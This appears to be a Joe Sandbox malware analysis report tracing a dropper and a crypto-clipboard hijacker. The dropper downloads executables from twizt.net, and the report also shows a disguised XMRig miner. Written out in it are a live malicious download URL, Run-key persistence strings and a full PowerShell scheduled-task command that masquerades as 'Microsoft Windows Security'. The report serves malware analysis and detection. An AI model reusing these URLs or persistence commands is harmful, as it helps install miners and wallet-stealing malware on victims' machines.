Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	11:34:30
Start date:	05/12/2024
Path:	C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
Imagebase:	0x7ff7a1ef0000
File size:	5'827'584 bytes
MD5 hash:	13B26B2C7048A92D6A843C1302618FAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	11:34:45
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3332, Parent PID: 3464

General

Target ID:	51
Start time:	11:34:45
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 04A3CCC0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1369111705.0000000004A3C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1366720920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1366742577.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1366762887.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1366785240.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1366785240.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1366785240.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1368983685.00000000049DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1368983685.00000000049DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1368983685.00000000049E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1368983685.0000000004A1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1368983685.0000000004A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1368983685.0000000004A2F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_f5TWdT5EAc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495

Analysis Process: 34D7.exePID: 7608, Parent PID: 7420COMMON

Execution Graph

Execution Coverage:	36.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.2%
Total number of Nodes:	92
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00251100 Relevance: 57.9, APIs: 27, Strings: 6, Instructions: 186
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00251109
srand.MSVCR90 ref: 00251110
ExpandEnvironmentStringsW.KERNEL32 ref: 0025112F
rand.MSVCR90 ref: 00251135
rand.MSVCR90 ref: 00251149
wsprintfW.USER32 ref: 00251175
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00251187
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002511AD
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 002511D1
InternetReadFile.WININET(00000000,?,00000103,?), ref: 002511FB
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 00251220
InternetReadFile.WININET(00000000,?,00000103,?), ref: 00251235
CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 00251240
wsprintfW.USER32 ref: 00251258
DeleteFileW.KERNELBASE(?,?,?,?,?,?,%temp%,?,00000104), ref: 00251269
CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 00251285
InternetCloseHandle.WININET(00000000), ref: 00251292
InternetCloseHandle.WININET(00000000), ref: 0025129A
Sleep.KERNELBASE(000003E8,?,?,%temp%,?,00000104), ref: 002512AB
rand.MSVCR90 ref: 002512B8
Sleep.KERNEL32 ref: 002512C6
rand.MSVCR90 ref: 002512C8
rand.MSVCR90 ref: 002512DC
wsprintfW.USER32 ref: 00251302
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0025131A
wsprintfW.USER32 ref: 00251335
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 00251342

Strings

%temp%, xrefs: 00251125
%s:Zone.Identifier, xrefs: 00251252
%s\%d%d.exe, xrefs: 002512FC
%s:Zone.Identifier, xrefs: 0025132F
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00251182
%s\%d%d.exe, xrefs: 0025116F

Memory Dump Source

Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true

Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_250000_34D7.jbxd

Similarity

API ID: File$Internet$rand$CloseHandlewsprintf$DeleteOpenReadSleep$CountCreateDownloadEnvironmentExpandStringsTickWritesrand
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
API String ID: 1566391613-1161929716
Opcode ID: ed2305e61315be2641477d8347ead5a4c4a32f6ab7bf98792d3adae0fc014dea
Instruction ID: 82f43a7dcdd82784cb81a7a8c3a05d478cb28d896d45b548b1803e7a77d8d9c1
Opcode Fuzzy Hash: ed2305e61315be2641477d8347ead5a4c4a32f6ab7bf98792d3adae0fc014dea
Instruction Fuzzy Hash: CB51D971555341FBE320DB50EC4AFAB33ADEBD5706F004919FA45921C0EA74A61CCB6A

Function 00251000 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00251018
wsprintfW.USER32 ref: 00251030
PathFileExistsW.KERNELBASE(00000000), ref: 0025103D
CreateFileW.KERNELBASE(40000000,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00251064
CloseHandle.KERNELBASE(00000000), ref: 00251070

Strings

%temp%, xrefs: 00251013
%s\33573537.jpg, xrefs: 0025102A
^Gv, xrefs: 0025103D

Memory Dump Source

Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true

Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_250000_34D7.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\33573537.jpg$%temp%$^Gv
API String ID: 750032643-1524248097
Opcode ID: 94cbb8ac653d6ae7fb9ba189c72fdd26274d98d5e30163bff9ef0ab1621e89b1
Instruction ID: ba9a8e5b00cc87371626ebec2eb6365604b487646bf1abf2b9b6a5aaaf0fc1c6
Opcode Fuzzy Hash: 94cbb8ac653d6ae7fb9ba189c72fdd26274d98d5e30163bff9ef0ab1621e89b1
Instruction Fuzzy Hash: 00F0F6B4500300F7E6309B20EC4EFD73368AB51706F808914BB65D10E1E7B5D1ACC659

Function 00251360 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 35
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00251365

Part of subcall function 00251100: GetTickCount.KERNEL32 ref: 00251109
Part of subcall function 00251100: srand.MSVCR90 ref: 00251110
Part of subcall function 00251100: ExpandEnvironmentStringsW.KERNEL32 ref: 0025112F
Part of subcall function 00251100: rand.MSVCR90 ref: 00251135
Part of subcall function 00251100: rand.MSVCR90 ref: 00251149
Part of subcall function 00251100: wsprintfW.USER32 ref: 00251175
Part of subcall function 00251100: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00251187
Part of subcall function 00251100: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002511AD
Part of subcall function 00251100: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 002511D1
Part of subcall function 00251100: InternetReadFile.WININET(00000000,?,00000103,?), ref: 002511FB
Part of subcall function 00251100: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 00251220
Part of subcall function 00251100: InternetReadFile.WININET(00000000,?,00000103,?), ref: 00251235

Part of subcall function 00251000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00251018
Part of subcall function 00251000: wsprintfW.USER32 ref: 00251030
Part of subcall function 00251000: PathFileExistsW.KERNELBASE(00000000), ref: 0025103D

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00251390
InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 002513B0
InternetCloseHandle.WININET(00000000), ref: 002513B7
InternetCloseHandle.WININET(00000000), ref: 002513BA

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0025138B
http://twizt.net/newtpp.exe, xrefs: 0025136B
http://twizt.net/peinstall.php, xrefs: 002513AA

Memory Dump Source

Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true

Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_250000_34D7.jbxd

Similarity

API ID: Internet$File$Open$CloseEnvironmentExpandHandleReadStringsrandwsprintf$CountCreateExistsPathSleepTickWritesrand
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/newtpp.exe$http://twizt.net/peinstall.php
API String ID: 2331825455-3619598175
Opcode ID: f85124ed442c13e9ba8d4dda3dd981fcdb920c3a0f92e67a83cfaa397b69d4b6
Instruction ID: 822e78970b0834b75c721f8d4c782d0dae4ac5656c8c4563805e560bb6c35c19
Opcode Fuzzy Hash: f85124ed442c13e9ba8d4dda3dd981fcdb920c3a0f92e67a83cfaa397b69d4b6
Instruction Fuzzy Hash: 21F03976BA2715B2E23127612C0FF4B26189B93F53F214051FF05BA1C1AAB4A42D89AD

Function 00251080 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 0025108C
CreateProcessW.KERNELBASE ref: 002510DC
Sleep.KERNELBASE(000003E8), ref: 002510EC

Strings

D, xrefs: 002510CC

Memory Dump Source

Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true

Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_250000_34D7.jbxd

Similarity

API ID: CreateProcessSleepmemset
String ID: D
API String ID: 4129363112-2746444292
Opcode ID: 2d9b2358e6c31d0836c5881ca85f1375f13969d72f137f11dcd70baaa6cbabc9
Instruction ID: d01517bf988eea040b69fdb8684e1dad4a95aa06413569bbb38ac180c9cab8d1
Opcode Fuzzy Hash: 2d9b2358e6c31d0836c5881ca85f1375f13969d72f137f11dcd70baaa6cbabc9
Instruction Fuzzy Hash: 5D0181B0A44300ABE310DF10CC46B4B77E4AB84B01F50481DF749DA2D0EBB5990C8B5B

Analysis Process: 896429707.exePID: 7668, Parent PID: 7608COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.7%
Total number of Nodes:	1437
Total number of Limit Nodes:	8

Executed Functions

Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
strcmp.NTDLL ref: 0040E752

Strings

UKR, xrefs: 0040E749

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B

Function 00407590 Relevance: 114.1, APIs: 50, Strings: 15, Instructions: 351
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000BB8), ref: 0040759E
CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
GetLastError.KERNEL32 ref: 004075B9
ExitProcess.KERNEL32 ref: 004075C8
GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
wsprintfW.USER32 ref: 0040762A
DeleteFileW.KERNELBASE(?), ref: 0040763A
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
wcscmp.NTDLL ref: 00407663
ExitProcess.KERNEL32 ref: 00407682

Strings

%windir%, xrefs: 00407694
%s:Zone.Identifier, xrefs: 0040761E
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004078DA
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004077DE
%userprofile%, xrefs: 0040764C
%s\%s, xrefs: 00407790
%s\%s, xrefs: 0040788C
%s\tbtnds.dat, xrefs: 0040798E
753f85d83d, xrefs: 004075A4
sysnldcvmr.exe, xrefs: 00407657, 0040769F, 00407784, 00407880
%temp%, xrefs: 00407875
%s\%s, xrefs: 004076AB
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004076F9
Windows Settings, xrefs: 00407737, 0040781C, 00407918
%s\tbtcmds.dat, xrefs: 004079A8

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
API String ID: 4172876685-2783337622
Opcode ID: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
Opcode Fuzzy Hash: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040E98E
memset.NTDLL ref: 0040E99E
CreateProcessW.KERNELBASE(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
Sleep.KERNELBASE(000003E8), ref: 0040E9E7
ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
Sleep.KERNEL32(000003E8), ref: 0040EA1C

Strings

D, xrefs: 0040E9A6
Gy@, xrefs: 0040E9D1, 0040E9F7, 0040E9D4, 0040E9FA
open, xrefs: 0040E9FB
, xrefs: 0040EA11

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$Gy@$open
API String ID: 3787208655-4184347819
Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

Non-executed Functions

Function 004066B0 Relevance: 79.1, APIs: 35, Strings: 10, Instructions: 305
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
wsprintfW.USER32 ref: 004066EF
wsprintfW.USER32 ref: 0040670F
wsprintfW.USER32 ref: 0040672F
wsprintfW.USER32 ref: 0040674F
wsprintfW.USER32 ref: 00406768
PathFileExistsW.SHLWAPI(?), ref: 00406778
SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
DeleteFileW.KERNEL32(?), ref: 004067BE
PathFileExistsW.SHLWAPI(?), ref: 004067CB
PathFileExistsW.SHLWAPI(?), ref: 004067E0
SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
DeleteFileW.KERNEL32(?), ref: 00406803
PathFileExistsW.SHLWAPI(?), ref: 00406810
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
PathFileExistsW.SHLWAPI(?), ref: 00406843

Strings

%s\%s\DriveSecManager.exe, xrefs: 00406723
%s\%s, xrefs: 00406B15
shell32.dll, xrefs: 004068A7
%s\%s, xrefs: 00406AA2
%s\%s, xrefs: 00406743
%s\%s\%s, xrefs: 00406B3C
%s.lnk, xrefs: 004066E3
shell32.dll, xrefs: 0040688F
%s\%s, xrefs: 00406703
%s\*, xrefs: 0040675C

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
API String ID: 2467965697-1256475382
Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59

Function 00404970 Relevance: 70.9, APIs: 24, Strings: 16, Instructions: 905clipboardstringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 0040498C
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D39
StrStrW.SHLWAPI(00000000,cosmos), ref: 00404D61
StrStrW.SHLWAPI(00000000,addr), ref: 00404D89
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404DC4
StrStrW.SHLWAPI(00000000,ronin:), ref: 00404DDB
StrStrW.SHLWAPI(00000000,nano_), ref: 00404DF2
StrStrW.SHLWAPI(00000000,bnb), ref: 004053A4
StrStrW.SHLWAPI(00000000,bc1p), ref: 004053C0
StrStrW.SHLWAPI(00000000,bc1q), ref: 004053DC
StrStrW.SHLWAPI(00000000,ronin:), ref: 0040545F
StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00405479
StrStrW.SHLWAPI(00000000,cosmos), ref: 00405493
StrStrW.SHLWAPI(00000000,addr), ref: 004054AD
StrStrW.SHLWAPI(00000000,nano_), ref: 004054C7
lstrlenA.KERNEL32(00000000), ref: 004054DC
GlobalAlloc.KERNEL32(00002002,-00000001), ref: 004054F7
GlobalLock.KERNEL32(00000000), ref: 0040550A
memcpy.NTDLL(00000000,00000000,-00000001), ref: 00405528
GlobalUnlock.KERNEL32(00000000), ref: 00405534
OpenClipboard.USER32(00000000), ref: 0040553C
EmptyClipboard.USER32 ref: 00405546
SetClipboardData.USER32(00000001,00000000), ref: 00405552
CloseClipboard.USER32 ref: 00405558

Strings

ronin:, xrefs: 00405456
A, xrefs: 00405446
bc1q, xrefs: 004053D3
bitcoincash:, xrefs: 00404DBB
nano_, xrefs: 004054BE
bc1p, xrefs: 004053B7
bitcoincash:, xrefs: 00404D30
ronin:, xrefs: 00404DD2
bnb, xrefs: 0040539B
bitcoincash:, xrefs: 00405470
cosmos, xrefs: 00404D58
cosmos, xrefs: 0040548A
8, xrefs: 00405401
nano_, xrefs: 00404DE9
addr, xrefs: 00404D80
addr, xrefs: 004054A4

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$nano_$nano_$ronin:$ronin:$A
API String ID: 2017104846-3944006828
Opcode ID: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
Instruction ID: c0db1a85d2b2ab719742c03712a747d69443af7a5f19e9c3a62e09ec18ebafc2
Opcode Fuzzy Hash: f10c215015187a64e35910754edbf43630524a633ee39edfa593be9c6f415941
Instruction Fuzzy Hash: E2822A70600218EACB648F45C0945BE7BB2EF82755F60C06BE8496F294D77CDED1EB98

Function 00407B20 Relevance: 62.3, APIs: 34, Strings: 1, Instructions: 1037
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_aullshr.NTDLL ref: 00407C1D
_allshl.NTDLL ref: 00407C36
_aullshr.NTDLL ref: 00407D04
_allshl.NTDLL ref: 00407D1D
_aullshr.NTDLL ref: 00407DE6
_allshl.NTDLL ref: 00407DFF
_aullshr.NTDLL ref: 00407EC8
_allshl.NTDLL ref: 00407EE1
_aullshr.NTDLL ref: 00407FAA
_allshl.NTDLL ref: 00407FC3
_aullshr.NTDLL ref: 00408086
_allshl.NTDLL ref: 0040809F
_aullshr.NTDLL ref: 00408162
_allshl.NTDLL ref: 0040817B
_aullshr.NTDLL ref: 0040823E
_allshl.NTDLL ref: 00408257
_aullshr.NTDLL ref: 0040831A
_allshl.NTDLL ref: 00408333
_aullshr.NTDLL ref: 004083F6
_allshl.NTDLL ref: 0040840F
_aullshr.NTDLL ref: 004084D2
_allshl.NTDLL ref: 004084EB
_aullshr.NTDLL ref: 004085AE
_allshl.NTDLL ref: 004085C7
_aullshr.NTDLL ref: 0040868A
_allshl.NTDLL ref: 004086A3
_aullshr.NTDLL ref: 00408766
_allshl.NTDLL ref: 0040877F
_aullshr.NTDLL ref: 00408842
_allshl.NTDLL ref: 0040885B
_aullshr.NTDLL ref: 00408918
_allshl.NTDLL ref: 00408931
_allshl.NTDLL ref: 00408952
_aullshr.NTDLL ref: 00408963

Strings

Y, xrefs: 00407B40

